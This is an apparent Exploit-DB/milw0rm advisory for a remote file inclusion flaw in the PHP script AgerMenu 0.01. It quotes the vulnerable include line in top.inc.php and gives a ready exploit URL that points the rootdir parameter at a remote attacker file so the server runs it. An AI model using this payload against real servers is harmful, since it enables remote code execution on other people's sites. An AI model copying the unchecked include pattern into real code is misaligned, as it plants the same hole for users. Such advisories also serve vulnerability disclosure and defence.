AgerMenu 0.01 - 'top.inc.php?rootdir' Remote File Inclusion

EDB-ID:

3280

Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2007-02-07

===============================================================
Discovered by GolD_M(Mahmnood_ali) & &  Contact: HackEr_@W.Cn
===============================================================
URL Script: http://www.chbs.dk/proj/agermenu/agermenu-0.01.tgz
===============================================================
V.CODE: In : [path]/example/inc/top.inc.php
include $rootdir."inc/agermenu.func.php";
===============================================================
Exploit: v.Cc/[path]/example/inc/top.inc.php?rootdir=Evil.txt?
===============================================================

# milw0rm.com [2007-02-07]